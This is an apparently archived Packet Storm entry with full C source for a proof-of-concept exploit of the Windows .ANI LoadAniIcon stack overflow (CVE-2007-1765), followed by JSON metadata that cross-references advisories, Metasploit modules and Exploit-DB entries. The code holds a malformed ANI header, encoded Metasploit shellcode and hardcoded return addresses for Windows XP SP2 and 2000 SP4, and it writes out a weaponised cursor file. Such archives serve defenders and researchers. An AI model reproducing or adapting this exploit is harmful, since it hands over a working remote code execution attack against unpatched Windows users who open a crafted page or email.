ID PACKETSTORM:55512 Type packetstorm Reporter devcode Modified 2007-04-02T00:00:00
Description
`/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
* A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
* error within the "LoadAniIcon()" [user32.dll] function when rendering
* cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
* tricking a user into visiting a malicious web page or viewing an email
* message containing a specially crafted ANI file.
*
* Hotfix/Patch:
* None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
* This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* For this to work on XP SP2 on explorer.exe, DEP has to be turned
* off.
*
*/
#include <iostream>
/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";
/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\tWindows XP SP2 [0]\n"
"\tWindows 2K SP4 [1]\n\n"
"Usage: ani.exe <target> <file>";
typedef struct {
const char *szTarget;
unsigned char uszRet[5];
} TARGET;
TARGET targets[] = {
{ "Windows XP SP2", "\xC9\x29\xD4\x77" }, /* call esp */
{ "Windows 2K SP4", "\x29\x4C\xE1\x77" }
};
int main( int argc, char **argv ) {
char szBuffer[1024];
FILE *f;
if ( argc < 3 ) {
printf("%s\n", szIntro );
return 0;
}
printf("[+] Creating ANI header...\n");
memset( szBuffer, 0x90, sizeof( szBuffer ) );
memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );
printf("[+] Copying shellcode...\n");
memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );
printf("%s\n", argv[2] );
f = fopen( argv[2], "wb" );
if ( f == NULL ) {
printf("[-] Cannot create file\n");
return 0;
}
fwrite( szBuffer, 1, 1024, f );
fclose( f );
printf("[+] .ANI file succesfully created!\n");
return 0;
}
`
{"hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c7d6a870f2e9a29172ad9e5983b6a669", "key": "cvelist"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "cadf423d1660b921da6dd71b8b509a8e", "key": "href"}, {"hash": "1f3013484776ab0ebd6e12dadc50bec3", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "1f3013484776ab0ebd6e12dadc50bec3", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0072e765ee070314826b7f41ce057b43", "key": "reporter"}, {"hash": "db7cb2a624f61e17d685c06086928f47", "key": "sourceData"}, {"hash": "c6760625bdd047b76d3a03119c47ae9c", "key": "sourceHref"}, {"hash": "e8164987774734bf0fc61e99606b9290", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "hash": "33df5dd7e5a708235bbb1fe69916d7761bcb3a83cf184fdd097399ebdb501245", "edition": 1, "references": [], "viewCount": 1, "type": "packetstorm", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/55512/devcode.txt", "reporter": "devcode", "cvelist": ["CVE-2007-1765"], "bulletinFamily": "exploit", "published": "2007-04-02T00:00:00", "title": "devcode.txt", "href": "https://packetstormsecurity.com/files/55512/devcode.txt.html", "history": [], "sourceData": "`/* \n* Copyright (c) 2007 devcode \n* \n* \n* ^^ D E V C O D E ^^ \n* \n* Windows .ANI LoadAniIcon Stack Overflow \n* [CVE-2007-1765] \n* \n* \n* Description: \n* A vulnerability has been identified in Microsoft Windows, \n* which could be exploited by remote attackers to take complete \n* control of an affected system. This issue is due to a stack overflow \n* error within the \"LoadAniIcon()\" [user32.dll] function when rendering \n* cursors, animated cursors or icons with a malformed header, which could \n* be exploited by remote attackers to execute arbitrary commands by \n* tricking a user into visiting a malicious web page or viewing an email \n* message containing a specially crafted ANI file. \n* \n* Hotfix/Patch: \n* None as of this time. \n* \n* Vulnerable systems: \n* Microsoft Windows 2000 Service Pack 4 \n* Microsoft Windows XP Service Pack 2 \n* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium) \n* Microsoft Windows XP Professional x64 Edition \n* Microsoft Windows Server 2003 \n* Microsoft Windows Server 2003 (Itanium) \n* Microsoft Windows Server 2003 Service Pack 1 \n* Microsoft Windows Server 2003 Service Pack 1 (Itanium) \n* Microsoft Windows Server 2003 x64 Edition \n* Microsoft Windows Vista \n* \n* Microsoft Internet Explorer 6 \n* Microsoft Internet Explorer 7 \n* \n* This is a PoC and was created for educational purposes only. The \n* author is not held responsible if this PoC does not work or is \n* used for any other purposes than the one stated above. \n* \n* Notes: \n* For this to work on XP SP2 on explorer.exe, DEP has to be turned \n* off. \n* \n*/ \n#include <iostream> \n \n/* ANI Header */ \nunsigned char uszAniHeader[] = \n\"\\x52\\x49\\x46\\x46\\x00\\x04\\x00\\x00\\x41\\x43\\x4F\\x4E\\x61\\x6E\\x69\\x68\" \n\"\\x24\\x00\\x00\\x00\\x24\\x00\\x00\\x00\\xFF\\xFF\\x00\\x00\\x0A\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\" \n\"\\x10\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\\x02\\x02\\x02\\x02\" \n\"\\x61\\x6E\\x69\\x68\\xA8\\x03\\x00\\x00\"; \n \n/* Shellcode - metasploit exec calc.exe ^^ */ \nunsigned char uszShellcode[] = \n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\" \n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x42\" \n\"\\x58\\x50\\x30\\x41\\x31\\x42\\x41\\x6b\\x41\\x41\\x52\\x32\\x41\\x42\\x41\\x32\" \n\"\\x42\\x41\\x30\\x42\\x41\\x58\\x50\\x38\\x41\\x42\\x75\\x38\\x69\\x79\\x6c\\x4a\" \n\"\\x48\\x67\\x34\\x47\\x70\\x77\\x70\\x53\\x30\\x6e\\x6b\\x67\\x35\\x45\\x6c\\x4c\" \n\"\\x4b\\x73\\x4c\\x74\\x45\\x31\\x68\\x54\\x41\\x68\\x6f\\x6c\\x4b\\x70\\x4f\\x57\" \n\"\\x68\\x6e\\x6b\\x71\\x4f\\x45\\x70\\x65\\x51\\x5a\\x4b\\x67\\x39\\x4c\\x4b\\x50\" \n\"\\x34\\x4c\\x4b\\x77\\x71\\x68\\x6e\\x75\\x61\\x4b\\x70\\x4e\\x79\\x6e\\x4c\\x4d\" \n\"\\x54\\x4b\\x70\\x72\\x54\\x65\\x57\\x69\\x51\\x49\\x5a\\x46\\x6d\\x37\\x71\\x6f\" \n\"\\x32\\x4a\\x4b\\x58\\x74\\x77\\x4b\\x41\\x44\\x44\\x64\\x35\\x54\\x72\\x55\\x7a\" \n\"\\x45\\x6c\\x4b\\x53\\x6f\\x51\\x34\\x37\\x71\\x48\\x6b\\x51\\x76\\x4c\\x4b\\x76\" \n\"\\x6c\\x50\\x4b\\x6e\\x6b\\x71\\x4f\\x67\\x6c\\x37\\x71\\x68\\x6b\\x4c\\x4b\\x65\" \n\"\\x4c\\x4c\\x4b\\x64\\x41\\x58\\x6b\\x4b\\x39\\x53\\x6c\\x75\\x74\\x46\\x64\\x78\" \n\"\\x43\\x74\\x71\\x49\\x50\\x30\\x64\\x6e\\x6b\\x43\\x70\\x44\\x70\\x4c\\x45\\x4f\" \n\"\\x30\\x41\\x68\\x44\\x4c\\x4e\\x6b\\x63\\x70\\x44\\x4c\\x6e\\x6b\\x30\\x70\\x65\" \n\"\\x4c\\x4e\\x4d\\x6c\\x4b\\x30\\x68\\x75\\x58\\x7a\\x4b\\x35\\x59\\x4c\\x4b\\x4d\" \n\"\\x50\\x58\\x30\\x37\\x70\\x47\\x70\\x77\\x70\\x6c\\x4b\\x65\\x38\\x57\\x4c\\x31\" \n\"\\x4f\\x66\\x51\\x48\\x76\\x65\\x30\\x70\\x56\\x4d\\x59\\x4a\\x58\\x6e\\x63\\x69\" \n\"\\x50\\x31\\x6b\\x76\\x30\\x55\\x38\\x5a\\x50\\x4e\\x6a\\x36\\x64\\x63\\x6f\\x61\" \n\"\\x78\\x6a\\x38\\x4b\\x4e\\x6c\\x4a\\x54\\x4e\\x76\\x37\\x6b\\x4f\\x4b\\x57\\x70\" \n\"\\x63\\x51\\x71\\x32\\x4c\\x52\\x43\\x37\\x70\\x42\"; \n \nchar szIntro[] = \n\"\\n\\t\\tWindows .ANI LoadAniIcon Stack Overflow\\n\" \n\"\\t\\t\\tdevcode (c) 2007\\n\" \n\"[+] Targets:\\n\" \n\"\\tWindows XP SP2 [0]\\n\" \n\"\\tWindows 2K SP4 [1]\\n\\n\" \n\"Usage: ani.exe <target> <file>\"; \n \ntypedef struct { \nconst char *szTarget; \nunsigned char uszRet[5]; \n} TARGET; \n \nTARGET targets[] = { \n{ \"Windows XP SP2\", \"\\xC9\\x29\\xD4\\x77\" }, /* call esp */ \n{ \"Windows 2K SP4\", \"\\x29\\x4C\\xE1\\x77\" } \n}; \n \nint main( int argc, char **argv ) { \nchar szBuffer[1024]; \nFILE *f; \n \nif ( argc < 3 ) { \nprintf(\"%s\\n\", szIntro ); \nreturn 0; \n} \n \nprintf(\"[+] Creating ANI header...\\n\"); \nmemset( szBuffer, 0x90, sizeof( szBuffer ) ); \nmemcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); \n \nprintf(\"[+] Copying shellcode...\\n\"); \nmemcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 ); \nmemcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 ); \n \nprintf(\"%s\\n\", argv[2] ); \nf = fopen( argv[2], \"wb\" ); \nif ( f == NULL ) { \nprintf(\"[-] Cannot create file\\n\"); \nreturn 0; \n} \n \nfwrite( szBuffer, 1, 1024, f ); \nfclose( f ); \nprintf(\"[+] .ANI file succesfully created!\\n\"); \nreturn 0; \n} \n`\n", "lastseen": "2016-12-05T22:19:41", "objectVersion": "1.2", "modified": "2007-04-02T00:00:00", "description": "", "id": "PACKETSTORM:55512", "enchantments": {"vulnersScore": 5.5}}
{"result": {"cve": [{"id": "CVE-2007-1765", "type": "cve", "title": "CVE-2007-1765", "description": "Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038; if so, then use CVE-2007-0038 instead of this identifier.", "published": "2007-03-29T20:19:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1765", "cvelist": ["CVE-2007-1765"], "lastseen": "2017-11-25T11:33:58"}], "packetstorm": [{"id": "PACKETSTORM:55661", "type": "packetstorm", "title": "devcode2.txt", "description": "", "published": "2007-04-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/55661/devcode2.txt.html", "cvelist": ["CVE-2007-1765"], "lastseen": "2016-12-05T22:21:36"}, {"id": "PACKETSTORM:55552", "type": "packetstorm", "title": "ani_loadimage_chunksize-email.rb.txt", "description": "", "published": "2007-04-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/55552/ani_loadimage_chunksize-email.rb.txt.html", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-12-05T22:15:33"}, {"id": "PACKETSTORM:55551", "type": "packetstorm", "title": "ani_loadimage_chunksize-browser.rb.txt", "description": "", "published": "2007-04-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/55551/ani_loadimage_chunksize-browser.rb.txt.html", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-12-05T22:23:32"}, {"id": "PACKETSTORM:83052", "type": "packetstorm", "title": "Windows ANI LoadAniIcon() Chunk Size Stack Overflow (SMTP)", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/83052/Windows-ANI-LoadAniIcon-Chunk-Size-Stack-Overflow-SMTP.html", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-12-05T22:24:34"}], "seebug": [{"id": "SSV:6614", "type": "seebug", "title": "MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)", "description": "No description provided by source.", "published": "2007-04-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-6614", "cvelist": ["CVE-2007-1765"], "lastseen": "2017-11-19T22:06:34"}, {"id": "SSV:14192", "type": "seebug", "title": "MS Windows Animated Cursor (.ANI) Stack Overflow Exploit", "description": "No description provided by source.", "published": "2007-03-31T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-14192", "cvelist": ["CVE-2007-1765"], "lastseen": "2017-11-19T22:06:34"}, {"id": "SSV:6535", "type": "seebug", "title": "MS Windows Animated Cursor (.ANI) Stack Overflow Exploit", "description": "No description provided by source.", "published": "2007-04-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-6535", "cvelist": ["CVE-2007-1765"], "lastseen": "2017-11-19T22:10:03"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/EMAIL/MS07_017_ANI_LOADIMAGE_CHUNKSIZE", "type": "metasploit", "title": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)", "description": "This module exploits a buffer overflow vulnerability in the LoadAniIcon() function of USER32.dll. The flaw is triggered through Outlook Express by using the CURSOR style sheet directive to load a malicious .ANI file. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.", "published": "2010-07-25T16:02:51", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2018-03-08T07:10:02"}], "exploitdb": [{"id": "EDB-ID:3652", "type": "exploitdb", "title": "Microsoft Windows - Animated Cursor .ANI Overflow Exploit Hardware DEP", "description": "MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP). CVE-2007-0038,CVE-2007-1765. Local exploit for windows platform", "published": "2007-04-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3652/", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-01-31T19:00:18"}, {"id": "EDB-ID:3636", "type": "exploitdb", "title": "Microsoft Windows - Animated Cursor .ANI Remote Exploit eeye patch bypass", "description": "MS Windows Animated Cursor (.ANI) Remote Exploit (eeye patch bypass). CVE-2007-0038,CVE-2007-1765. Remote exploit for windows platform", "published": "2007-04-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3636/", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-01-31T18:58:30"}, {"id": "EDB-ID:3634", "type": "exploitdb", "title": "Microsoft Windows XP/Vista - Animated Cursor .ANI Remote Overflow Exploit", "description": "MS Windows XP/Vista Animated Cursor (.ANI) Remote Overflow Exploit. CVE-2007-0038,CVE-2007-1765. Remote exploit for windows platform", "published": "2007-04-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3634/", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-01-31T18:58:08"}, {"id": "EDB-ID:3617", "type": "exploitdb", "title": "Microsoft Windows - Animated Cursor .ANI Stack Overflow Exploit", "description": "MS Windows Animated Cursor (.ANI) Stack Overflow Exploit. CVE-2007-0038,CVE-2007-1765. Local exploit for windows platform", "published": "2007-03-31T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3617/", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-01-31T18:55:24"}, {"id": "EDB-ID:3635", "type": "exploitdb", "title": "Microsoft Windows XP - Animated Cursor .ANI Remote Overflow Exploit 2", "description": "MS Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2. CVE-2007-0038,CVE-2007-1765. Remote exploit for windows platform", "published": "2007-04-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3635/", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-01-31T18:58:19"}, {"id": "EDB-ID:16698", "type": "exploitdb", "title": "Windows ANI LoadAniIcon Chunk Size Stack Buffer Overflow SMTP", "description": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP). CVE-2007-0038,CVE-2007-1765. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16698/", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2016-02-02T06:17:43"}], "osvdb": [{"id": "OSVDB:33629", "type": "osvdb", "title": "Microsoft IE Animated Cursor (.ani) Handling Arbitrary Command Execution", "description": "## Vulnerability Description\nA remote overflow exists in Microsoft Internet Explorer. The browser fails to check the buffer on animated cursors and icons resulting in a stack buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nA remote overflow exists in Microsoft Internet Explorer. The browser fails to check the buffer on animated cursors and icons resulting in a stack buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor Specific Solution URL: http://www.microsoft.com/technet/security/bulletin/ms07-apr.mspx\nVendor Specific News/Changelog Entry: http://blogs.technet.com/msrc/archive/2007/04/01/latest-on-security-update-for-microsoft-security-advisory-935423.aspx\nVendor Specific News/Changelog Entry: http://www.microsoft.com/technet/security/advisory/935423.mspx\n[Vendor Specific Advisory URL](http://blogs.technet.com/msrc/archive/2007/03/29/microsoft-security-advisory-935423-posted.aspx)\n[Vendor Specific Advisory URL](http://www.microsoft.com/technet/security/advisory/935423.mspx)\nSecurity Tracker: 1017827\n[Secunia Advisory ID:24659](https://secuniaresearch.flexerasoftware.com/advisories/24659/)\nOther Solution URL: http://zert.isotf.org/advisories/zert-2007-01.htm\nOther Solution URL: http://research.eeye.com/html/alerts/zeroday/20070328.html\nOther Advisory URL: http://www.avertlabs.com/research/blog/?p=230\nOther Advisory URL: http://vil.nai.com/vil/content/v_141860.htm\nOther Advisory URL: http://www.avertlabs.com/research/blog/?p=233\nOther Advisory URL: http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp\nNews Article: http://news.softpedia.com/news/Windows-Vista-Suicide-Courtesy-of-McAfee-50761.shtml\nNews Article: http://www.informationweek.com/news/showArticle.jhtml?articleID=198800828\nNews Article: http://www.securityfocus.com/brief/474?ref=rss\nNews Article: http://news.bbc.co.uk/2/hi/technology/6526851.stm\nNews Article: http://www.securityfocus.com/brief/472?ref=rss\nNews Article: http://www.informationweek.com/news/showArticle.jhtml?articleID=198900231\nMicrosoft Security Bulletin: MS07-017\nMicrosoft Knowledge Base Article: 925902\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-03/0470.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0013.html\nGeneric Exploit URL: http://whitestar.linuxbox.org/pipermail/exploits/2007-March/000167.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3636\nGeneric Exploit URL: http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3635\nGeneric Exploit URL: http://asert.arbornetworks.com/2007/04/never-slow-down-ms07-017-ani-exploit\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3634\nGeneric Exploit URL: http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb\nFrSIRT Advisory: ADV-2007-1151\n[CVE-2007-0038](https://vulners.com/cve/CVE-2007-0038)\n[CVE-2007-1765](https://vulners.com/cve/CVE-2007-1765)\nCERT VU: 191609\nBugtraq ID: 23194\n", "published": "2007-03-29T18:34:47", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:33629", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2017-04-28T13:20:29"}], "nessus": [{"id": "SMB_NT_MS07-017.NASL", "type": "nessus", "title": "MS07-017: Vulnerabilities in GDI Could Allow Remote Code Execution (925902)", "description": "The remote host is running a version of Windows with a bug in the Animated Cursor (ANI) handling routine that could allow an attacker to execute arbitrary code on the remote host by sending a specially crafted email or by luring a user on the remote host into visiting a rogue web site.\n\nAdditionally, the system is vulnerable to :\n\n - Local Privilege Elevation (GDI, EMF, Font Rasterizer)\n\n - Denial of Service (WMF)", "published": "2007-04-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=24911", "cvelist": ["CVE-2007-1211", "CVE-2007-1213", "CVE-2006-5586", "CVE-2007-1212", "CVE-2007-1215", "CVE-2007-0038", "CVE-2006-5758", "CVE-2007-1765"], "lastseen": "2017-10-29T13:37:10"}]}}